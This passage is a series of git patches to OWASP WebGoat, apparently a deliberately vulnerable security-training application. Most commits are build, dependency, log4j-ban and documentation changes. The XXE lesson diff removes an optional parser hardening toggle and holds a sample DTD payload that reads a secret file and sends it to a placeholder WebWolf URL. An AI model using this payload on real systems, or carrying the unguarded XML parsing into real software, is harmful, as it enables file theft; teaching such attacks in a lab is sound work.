     @ResponseBody
-    public AttackResult createNewComment(HttpServletRequest request, @RequestBody String commentStr) throws Exception {
+    public AttackResult createNewComment(HttpServletRequest request, @RequestBody String commentStr) {
         String error = "";
         try {
-        	boolean secure = false;
-        	if (null != request.getSession().getAttribute("applySecurity")) {
-        		secure = true;
-        	}
-            Comment comment = comments.parseXml(commentStr, secure);
-            //System.err.println("Comment " + comment);
+            var comment = comments.parseXml(commentStr);
             comments.addComment(comment, false);
             if (checkSolution(comment)) {
                 return success(this).build();
@@ -103,21 +97,12 @@ public class SimpleXXE extends AssignmentEndpoint {
     @RequestMapping(path = "/xxe/sampledtd", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
     @ResponseBody
     public String getSampleDTDFile() {
-        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
-                + "<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n"
-                + "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>\">\n"
-                + "%all;";
-    }
-    
-    @GetMapping(path="/xxe/applysecurity",produces=MediaType.TEXT_PLAIN_VALUE)
-    @ResponseBody
-    public String setSecurity(HttpServletRequest request) {
-		
-		String applySecurity = (String) request.getSession().getAttribute("applySecurity");
-		if (applySecurity == null) {
-			request.getSession().setAttribute("applySecurity", "true");
-		}
-		return "xxe security patch is now applied, you can try the previous challenges and see the effect!";
+        return """
+                <?xml version="1.0" encoding="UTF-8"?>
+                <!ENTITY % file SYSTEM "file:replace-this-by-webgoat-temp-directory/XXE/secret.txt">
+                <!ENTITY % all "<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>">
+                %all;
+                """;
     }
 
 }
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/User.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/User.java
index fd10e7fea..32e55b050 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/User.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/User.java
@@ -29,7 +29,6 @@ public class User {
 
     private String username = "";
     private String password = "";
-    private String email = "";
 
     public String getPassword() {
         return password;
@@ -47,12 +46,4 @@ public class User {
         this.username = username;
     }
 
-    public String getEmail() {
-        return email;
-    }
-
-    public void setEmail(String email) {
-        this.email = email;
-    }
-
 }
diff --git a/webgoat-lessons/xxe/src/main/resources/html/XXE.html b/webgoat-lessons/xxe/src/main/resources/html/XXE.html
index 20a232b39..e2cc3685e 100644
--- a/webgoat-lessons/xxe/src/main/resources/html/XXE.html
+++ b/webgoat-lessons/xxe/src/main/resources/html/XXE.html
@@ -221,8 +221,8 @@
 <div class="lesson-page-wrapper">
     <div class="adoc-content" th:replace="doc:XXE_static_code_analysis.adoc"></div>
     <br/>
-    <a id="submitlink" class="btn btn-primary" href="" onclick="javascript:$('#patchbutton').load('/WebGoat/xxe/applysecurity');return false;"><span id="patchbutton">Apply XXE security patch</span></a>
+    <a id="submitlink" class="btn btn-primary" href="" onclick="javascript:$('#patchbutton').load('/WebGoat/service/enable-security.mvc');return false;"><span id="patchbutton">Apply XXE security patch</span></a>
 </div>
 
 </body>
-</html>
\ No newline at end of file
+</html>

From a42f8fcf750412a396a7fcd7b6d68e0ad6042dfb Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 19 Dec 2021 14:46:33 +0100
Subject: [PATCH 121/227] No progress information for Maven

---
 .github/workflows/branch_build.yml | 6 +++---
 .github/workflows/pr_build.yml     | 2 +-
 .github/workflows/release.yml      | 4 ++--
 3 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index 46d38723b..57748ea5e 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -25,7 +25,7 @@ jobs:
           key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
           restore-keys: ubuntu-latest-m2
       - name: Test with Maven
-        run: mvn install -DskipTests
+        run: mvn --no-transfer-progress install -DskipTests
 
   testing:
     if: "github.repository != 'WebGoat/WebGoat'"
@@ -34,8 +34,8 @@ jobs:
     strategy:
       matrix:
         args:
-          - mvn -pl '!webgoat-integration-tests' test
-          - mvn -pl webgoat-integration-tests test
+          - mvn --no-transfer-progress -pl '!webgoat-integration-tests' test
+          - mvn --no-transfer-progress -pl webgoat-integration-tests test
     steps:
       - uses: actions/checkout@v2
       - name: set up JDK 17
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 1eee1f7b8..e343f6939 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -42,4 +42,4 @@ jobs:
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
           restore-keys: ${{ runner.os }}-m2
       - name: Build with Maven
-        run: mvn package
+        run: mvn --no-transfer-progress package
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 74ad073da..b75f1817f 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -38,8 +38,8 @@ jobs:
           echo "WEBGOAT_MAVEN_VERSION=${WEBGOAT_MAVEN_VERSION:1}" >> $GITHUB_ENV
       - name: Build with Maven
         run: |
-          mvn versions:set -DnewVersion=${{ env.WEBGOAT_MAVEN_VERSION }}
-          mvn install -DskipTests
+          mvn --no-transfer-progress versions:set -DnewVersion=${{ env.WEBGOAT_MAVEN_VERSION }}
+          mvn --no-transfer-progress install -DskipTests
 
       - name: "Create release"
         uses: softprops/action-gh-release@v1

From 44f70ce4dc4b86d3fbee482e071e55402c9af980 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 20 Dec 2021 10:20:11 +0100
Subject: [PATCH 122/227] Remove unnecessary compiler section from pom.xml as
 it confuses Intellij while importing

---
 pom.xml | 10 ----------
 1 file changed, 10 deletions(-)

diff --git a/pom.xml b/pom.xml
index 143eef96a..ff5eaa840 100644
--- a/pom.xml
+++ b/pom.xml
@@ -184,16 +184,6 @@
                     </execution>
                 </executions>
             </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-compiler-plugin</artifactId>
-                <version>${maven-compiler-plugin.version}</version>
-                <configuration>
-                    <source>15</source>
-                    <target>15</target>
-                    <encoding>UTF-8</encoding>
-                </configuration>
-            </plugin>
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-checkstyle-plugin</artifactId>

From cb6b1d73d1b6c3ec9b659a2c53727ffaeaa16573 Mon Sep 17 00:00:00 2001
From: "Zubcevic.com" <rene@zubcevic.com>
Date: Thu, 16 Dec 2021 15:41:39 +0100
Subject: [PATCH 123/227] upgrade to latest spring-boot libs and fixed related
 issues

---
 pom.xml                                                |  4 ++--
 webgoat-container/pom.xml                              | 10 ++++++++++
 .../org/owasp/webgoat/users/UserValidatorTest.java     |  2 +-
 .../webgoat/client_side_filtering/ShopEndpoint.java    |  2 ++
 webwolf/pom.xml                                        | 10 ++++++++++
 5 files changed, 25 insertions(+), 3 deletions(-)

diff --git a/pom.xml b/pom.xml
index ff5eaa840..cbc888ee0 100644
--- a/pom.xml
+++ b/pom.xml
@@ -11,7 +11,7 @@
     <parent>
         <groupId>org.springframework.boot</groupId>
         <artifactId>spring-boot-starter-parent</artifactId>
-        <version>2.5.4</version>
+        <version>2.6.1</version>
     </parent>
 
     <name>WebGoat Parent Pom</name>
@@ -124,7 +124,6 @@
         <commons-lang3.version>3.12.0</commons-lang3.version>
         <commons-io.version>2.6</commons-io.version>
         <guava.version>30.1-jre</guava.version>
-        <lombok.version>1.18.20</lombok.version>
         <wiremock.version>2.27.2</wiremock.version>
         <maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version>
         <maven-failsafe-plugin.version>2.22.0</maven-failsafe-plugin.version>
@@ -133,6 +132,7 @@
         <maven-source-plugin.version>3.1.0</maven-source-plugin.version>
         <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
         <java.version>17</java.version>
+        <thymeleaf.version>3.0.14.RELEASE</thymeleaf.version>
     </properties>
 
     <modules>
diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml
index f8f81365c..35e4645bd 100644
--- a/webgoat-container/pom.xml
+++ b/webgoat-container/pom.xml
@@ -51,6 +51,16 @@
         <dependency>
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-actuator</artifactId>
+           <exclusions>
+                <exclusion>
+                    <groupId>org.apache.logging.log4j</groupId>
+                    <artifactId>log4j-api</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.logging.log4j</groupId>
+                    <artifactId>log4j-to-slf4j</artifactId>
+                </exclusion>
+            </exclusions>
         </dependency>
         <dependency>
             <groupId>org.flywaydb</groupId>
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserValidatorTest.java b/webgoat-container/src/test/java/org/owasp/webgoat/users/UserValidatorTest.java
index 66ea4227e..d705b23d4 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserValidatorTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/users/UserValidatorTest.java
@@ -9,7 +9,7 @@ import org.springframework.validation.BeanPropertyBindingResult;
 import org.springframework.validation.Errors;
 
 import static org.assertj.core.api.Assertions.assertThat;
-import static org.mockito.Matchers.anyString;
+import static org.mockito.ArgumentMatchers.anyString;
 import static org.mockito.Mockito.when;
 
 @ExtendWith(MockitoExtension.class)
diff --git a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ShopEndpoint.java b/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ShopEndpoint.java
index 470252ce5..283c0662d 100644
--- a/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ShopEndpoint.java
+++ b/webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/client_side_filtering/ShopEndpoint.java
@@ -23,8 +23,10 @@
 package org.owasp.webgoat.client_side_filtering;
 
 import com.beust.jcommander.internal.Lists;
+
 import lombok.AllArgsConstructor;
 import lombok.Getter;
+
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PathVariable;
diff --git a/webwolf/pom.xml b/webwolf/pom.xml
index 5daf7dffd..8bb28bfe1 100644
--- a/webwolf/pom.xml
+++ b/webwolf/pom.xml
@@ -66,6 +66,16 @@
         <dependency>
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-actuator</artifactId>
+            <exclusions>
+                <exclusion>
+                    <groupId>org.apache.logging.log4j</groupId>
+                    <artifactId>log4j-api</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.logging.log4j</groupId>
+                    <artifactId>log4j-to-slf4j</artifactId>
+                </exclusion>
+            </exclusions>
         </dependency>
         <dependency>
             <groupId>org.springframework.retry</groupId>

From 7ded0968c1e699fdf84c3d106bfc27c9e7ae536f Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 20 Dec 2021 17:29:25 +0100
Subject: [PATCH 124/227] Ban log4j all together and update OWASP dep check

Remove
---
 pom.xml | 48 ++++++++++++++++++++++++++++++++++++++----------
 1 file changed, 38 insertions(+), 10 deletions(-)

diff --git a/pom.xml b/pom.xml
index cbc888ee0..84fca14d0 100644
--- a/pom.xml
+++ b/pom.xml
@@ -133,6 +133,8 @@
         <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
         <java.version>17</java.version>
         <thymeleaf.version>3.0.14.RELEASE</thymeleaf.version>
+        <pmd.version>3.15.0</pmd.version>
+        <checkstyle.version>3.1.2</checkstyle.version>
     </properties>
 
     <modules>
@@ -141,14 +143,15 @@
         <module>webgoat-server</module>
         <module>webwolf</module>
         <module>webgoat-integration-tests</module>
-		<module>docker</module><!-- copy required jars in preparation of docker all-in-one build -->
+        <module>docker</module><!-- copy required jars in preparation of docker all-in-one build -->
     </modules>
 
+
     <dependencies>
-	    <dependency>
-			<groupId>org.springframework.boot</groupId>
-			<artifactId>spring-boot-starter-validation</artifactId>
-		</dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-validation</artifactId>
+        </dependency>
         <dependency>
             <groupId>org.projectlombok</groupId>
             <artifactId>lombok</artifactId>
@@ -187,7 +190,7 @@
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-checkstyle-plugin</artifactId>
-                <version>3.1.2</version>
+                <version>${checkstyle.version}</version>
                 <configuration>
                     <encoding>UTF-8</encoding>
                     <consoleOutput>true</consoleOutput>
@@ -200,10 +203,11 @@
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-pmd-plugin</artifactId>
-                <version>3.14.0</version>
+                <version>${pmd.version}</version>
                 <configuration>
-                    <targetJdk>15</targetJdk>
-                    <failurePriority>1</failurePriority><!-- 5 means fail even on the lowest priority, 0 means never fail -->
+                    <targetJdk>${maven.compiler.target}</targetJdk>
+                    <failurePriority>1
+                    </failurePriority><!-- 5 means fail even on the lowest priority, 0 means never fail -->
                     <rulesets>
                         <!--suppress UnresolvedMavenProperty -->
                         <ruleset>${maven.multiModuleProjectDirectory}/config/pmd/pmd-ruleset.xml</ruleset>
@@ -219,6 +223,30 @@
                     </execution>
                 </executions>
             </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-enforcer-plugin</artifactId>
+                <version>3.0.0</version>
+                <executions>
+                    <execution>
+                        <id>Restrict-bad-log4j-versions</id>
+                        <phase>validate</phase>
+                        <goals>
+                            <goal>enforce</goal>
+                        </goals>
+                        <configuration>
+                            <rules>
+                                <bannedDependencies>
+                                    <excludes>
+                                        <exclude>org.apache.logging.log4j:log4j-core:(,2.15.0)</exclude>
+                                    </excludes>
+                                </bannedDependencies>
+                            </rules>
+                            <fail>true</fail>
+                        </configuration>
+                    </execution>
+                </executions>
+            </plugin>
         </plugins>
     </build>
 
@@ -233,7 +261,7 @@
                     <plugin>
                         <groupId>org.owasp</groupId>
                         <artifactId>dependency-check-maven</artifactId>
-                        <version>6.1.3</version>
+                        <version>6.5.1</version>
                         <configuration>
                             <failBuildOnCVSS>7</failBuildOnCVSS>
                             <skipProvidedScope>true</skipProvidedScope>

From 85d4633f621531fa1cb1231e30e2f572d5d70aba Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 21 Dec 2021 10:05:12 +0100
Subject: [PATCH 125/227] Update enforcer and exclude log4j-core completely
 (every version)

---
 pom.xml | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)

diff --git a/pom.xml b/pom.xml
index 84fca14d0..0cf890ec0 100644
--- a/pom.xml
+++ b/pom.xml
@@ -187,6 +187,16 @@
                     </execution>
                 </executions>
             </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>${maven-compiler-plugin.version}</version>
+                <configuration>
+                    <source>15</source>
+                    <target>15</target>
+                    <encoding>UTF-8</encoding>
+                </configuration>
+            </plugin>
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-checkstyle-plugin</artifactId>
@@ -229,7 +239,7 @@
                 <version>3.0.0</version>
                 <executions>
                     <execution>
-                        <id>Restrict-bad-log4j-versions</id>
+                        <id>restrict-log4j-versions</id>
                         <phase>validate</phase>
                         <goals>
                             <goal>enforce</goal>
@@ -237,8 +247,8 @@
                         <configuration>
                             <rules>
                                 <bannedDependencies>
-                                    <excludes>
-                                        <exclude>org.apache.logging.log4j:log4j-core:(,2.15.0)</exclude>
+                                    <excludes combine.children="append">
+                                        <exclude>org.apache.logging.log4j:log4j-core</exclude>
                                     </excludes>
                                 </bannedDependencies>
                             </rules>

From c5389f31c3670b073c56a9e4bb1a785d54ee5b13 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Tue, 21 Dec 2021 09:07:59 +0000
Subject: [PATCH 126/227] Bump docker/login-action from 1.9.0 to 1.12.0

Bumps [docker/login-action](https://github.com/docker/login-action) from 1.9.0 to 1.12.0.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v1.9.0...v1.12.0)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index b75f1817f..5629a4405 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -83,7 +83,7 @@ jobs:
         uses: docker/setup-buildx-action@v1
 
       - name: "Login to dockerhub"
-        uses: docker/login-action@v1.9.0
+        uses: docker/login-action@v1.12.0
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}

From c000a9b467cb71db93d9662344a4690e1e7252ea Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 22 Dec 2021 12:55:27 +0100
Subject: [PATCH 127/227] Improve startup message Docker

---
 docker/start.sh | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/docker/start.sh b/docker/start.sh
index d25b00214..a4912e120 100755
--- a/docker/start.sh
+++ b/docker/start.sh
@@ -51,8 +51,9 @@ function write_start_message() {
        \  /\  /  |  __/ | |_) | | |__| | | (_) | | (_| | | |_
         \/  \/    \___| |_.__/   \_____|  \___/   \__,_|  \__|
   " >> webgoat.log
-  echo "WebGoat and WebWolf successfully started..." >> webgoat.log
-  pidof nginx >/dev/null && echo "Browse to http://localhost to get started" >> webgoat.log ||  echo "Browse to http://localhost:8080/WebGoat or http://localhost:9090/WebWolf to get started" >> webgoat.log
+  echo $'WebGoat and WebWolf successfully started...\n' >> webgoat.log
+  echo "NOTE: port numbers mentioned below may vary depending on your port mappings while starting the Docker container" >> webgoat.log
+  pidof nginx >/dev/null && echo "Browse to http://localhost to get started" >> webgoat.log || echo "Browse to http://localhost:8080/WebGoat or http://localhost:9090/WebWolf to get started." >> webgoat.log
 }
 
 function tail_log_file() {

From 969335f2f6b65fa4deea574abaf988736a45f71d Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 22 Dec 2021 15:57:11 +0100
Subject: [PATCH 128/227] Update documentation for starting with `java -jar`

---
 README.md | 20 +++++++++++++-------
 1 file changed, 13 insertions(+), 7 deletions(-)

diff --git a/README.md b/README.md
index b3a9c0873..dc49f8363 100644
--- a/README.md
+++ b/README.md
@@ -56,8 +56,8 @@ WebWolf will be located at: http://localhost:9090/WebWolf
 Download the latest WebGoat and WebWolf release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
-java -Dfile.encoding=UTF-8 -jar webgoat-server-8.2.2.jar [--server.port=8080] [--server.address=localhost] [--hsqldb.port=9001]
-java -Dfile.encoding=UTF-8 -jar webwolf-8.2.2.jar [--server.port=9090] [--server.address=localhost] [--hsqldb.port=9001]
+java -Dfile.encoding=UTF-8 -Dserver.port=8080 -Dserver.address=localhost -Dhsqldb.port=9001 -jar webgoat-server-8.2.2.jar 
+java -Dfile.encoding=UTF-8 -Dserver.port=9090 -Dserver.address=localhost -jar webwolf-8.2.2.jar
 ```
 
 WebGoat will be located at: http://localhost:8080/WebGoat and   
@@ -68,7 +68,6 @@ WebWolf will be located at: http://localhost:9090/WebWolf (change ports if neces
 ### Prerequisites:
 
 * Java 17
-* Maven > 3.2.1
 * Your favorite IDE
 * Git, or Git support in your IDE
 
@@ -83,18 +82,25 @@ Now let's start by compiling the project.
 ```Shell
 cd WebGoat
 git checkout <<branch_name>>
-mvn clean install
+# On Linux/Mac:
+./mvnw clean install 
+# On Windows:
+./mvnw.cmd clean install
 ```
 
 Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
 
 ```Shell
-mvn -pl webgoat-server spring-boot:run
+# On Linux/Mac:
+./mvnw -pl webgoat-server spring-boot:run
+# On Widows:
+./mvnw.cmd -pl webgoat-server spring-boot:run
+
 ```
-... you should be running webgoat on localhost:8080/WebGoat momentarily
+... you should be running WebGoat on localhost:8080/WebGoat momentarily
 
 
-To change the IP address add the following variable to the WebGoat/webgoat-container/src/main/resources/application.properties file:
+To change the IP address add the following variable to the `WebGoat/webgoat-container/src/main/resources/application.properties file`:
 
 ```
 server.address=x.x.x.x

From 44ab36aa1b43c6f9e546ea08271feefaf364428f Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 22 Dec 2021 15:57:39 +0100
Subject: [PATCH 129/227] Add message that WebGoat should be running while
 detecting datasource

---
 .../src/main/java/org/owasp/webwolf/db/DataSourceResolver.java  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java b/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
index 407b66ed5..c5ccce5aa 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
+++ b/webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
@@ -94,7 +94,7 @@ public class DataSourceResolver {
     }
 
     public void healthCheck(RestTemplate restTemplate) {
-        log.info("Checking database availability.");
+        log.info("Checking database availability (make sure WebGoat is running)...");
         JsonNode json = restTemplate.getForObject(baseUrl + dbHealthPath, JsonNode.class);
         String status = getDsHealthStatus(json);
         if (!status.equals("UP")) {

From 3bc009297e49975ec753d66e8da5c27a96816d2f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Thu, 23 Dec 2021 17:07:55 +0100
Subject: [PATCH 130/227] Update SessionManagementTest.java (#1198)

url() is required in this case. You will notice it when changing host name or when using https
---
 .../src/test/java/org/owasp/webgoat/SessionManagementTest.java  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
index 1d086bbf4..a716ac98a 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
@@ -42,6 +42,6 @@ class SessionManagementTest extends IntegrationTest {
     void hijackSessionTest() {
         startLesson("HijackSession");
         
-        checkAssignment(HIJACK_LOGIN_CONTEXT_PATH, Map.of("username", "webgoat", "password", "webgoat"), false);
+        checkAssignment(url(HIJACK_LOGIN_CONTEXT_PATH), Map.of("username", "webgoat", "password", "webgoat"), false);
     }
 }

From 2332bf22a7534eab97066b7c6970814c85f79635 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 28 Feb 2022 07:58:56 +0100
Subject: [PATCH 131/227] Bump docker/login-action from 1.12.0 to 1.13.0
 (#1209)

Bumps [docker/login-action](https://github.com/docker/login-action) from 1.12.0 to 1.13.0.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v1.12.0...v1.13.0)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 5629a4405..a50e4c2c9 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -83,7 +83,7 @@ jobs:
         uses: docker/setup-buildx-action@v1
 
       - name: "Login to dockerhub"
-        uses: docker/login-action@v1.12.0
+        uses: docker/login-action@v1.13.0
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}

From 32475ea37ebf22a10447a7a8440c3cb419384753 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 9 Mar 2022 14:52:28 +0100
Subject: [PATCH 132/227] Bump docker/login-action from 1.13.0 to 1.14.1
 (#1214)

Bumps [docker/login-action](https://github.com/docker/login-action) from 1.13.0 to 1.14.1.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v1.13.0...v1.14.1)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index a50e4c2c9..b9a393585 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -83,7 +83,7 @@ jobs:
         uses: docker/setup-buildx-action@v1
 
       - name: "Login to dockerhub"
-        uses: docker/login-action@v1.13.0
+        uses: docker/login-action@v1.14.1
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}

From 984548ae8866512d5d098e48b3e40097756140f3 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 9 Mar 2022 14:52:49 +0100
Subject: [PATCH 133/227] Bump actions/checkout from 2 to 3 (#1213)

Bumps [actions/checkout](https://github.com/actions/checkout) from 2 to 3.
- [Release notes](https://github.com/actions/checkout/releases)
- [Changelog](https://github.com/actions/checkout/blob/main/CHANGELOG.md)
- [Commits](https://github.com/actions/checkout/compare/v2...v3)

---
updated-dependencies:
- dependency-name: actions/checkout
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/branch_build.yml | 4 ++--
 .github/workflows/pr_build.yml     | 2 +-
 .github/workflows/release.yml      | 4 ++--
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index 57748ea5e..d32e3d7f7 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -11,7 +11,7 @@ jobs:
     runs-on: ubuntu-latest
     name: "Package and linting"
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
       - name: set up JDK 17
         uses: actions/setup-java@v2
         with:
@@ -37,7 +37,7 @@ jobs:
           - mvn --no-transfer-progress -pl '!webgoat-integration-tests' test
           - mvn --no-transfer-progress -pl webgoat-integration-tests test
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
       - name: set up JDK 17
         uses: actions/setup-java@v2
         with:
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index e343f6939..31c4ed07c 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -28,7 +28,7 @@ jobs:
         os: [ubuntu-latest, windows-latest, macos-latest]
         java: [17]
     steps:
-      - uses: actions/checkout@v2
+      - uses: actions/checkout@v3
       - name: Set up JDK ${{ matrix.java }}
         uses: actions/setup-java@v2
         with:
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index b9a393585..140f1a397 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -11,7 +11,7 @@ jobs:
     environment:
       name: release
     steps:
-      - uses: actions/checkout@v2.3.4
+      - uses: actions/checkout@v3
 
       - name: "Get tag name"
         id: tag
@@ -111,7 +111,7 @@ jobs:
     environment:
       name: release
     steps:
-      - uses: actions/checkout@v2.3.4
+      - uses: actions/checkout@v3
         with:
           ref: develop
           token: ${{ secrets.WEBGOAT_DEPLOYER_TOKEN }}

From bed2eed8d8ce3f13d7ebc15e82a7b46843c250d9 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Sat, 26 Mar 2022 14:32:53 +0100
Subject: [PATCH 134/227] Bump docker/build-push-action from 2.7.0 to 2.10.0
 (#1218)

Bumps [docker/build-push-action](https://github.com/docker/build-push-action) from 2.7.0 to 2.10.0.
- [Release notes](https://github.com/docker/build-push-action/releases)
- [Commits](https://github.com/docker/build-push-action/compare/v2.7.0...v2.10.0)

---
updated-dependencies:
- dependency-name: docker/build-push-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 140f1a397..8ae5eff1d 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -89,7 +89,7 @@ jobs:
           password: ${{ secrets.DOCKERHUB_TOKEN }}
 
       - name: "Build and push"
-        uses: docker/build-push-action@v2.7.0
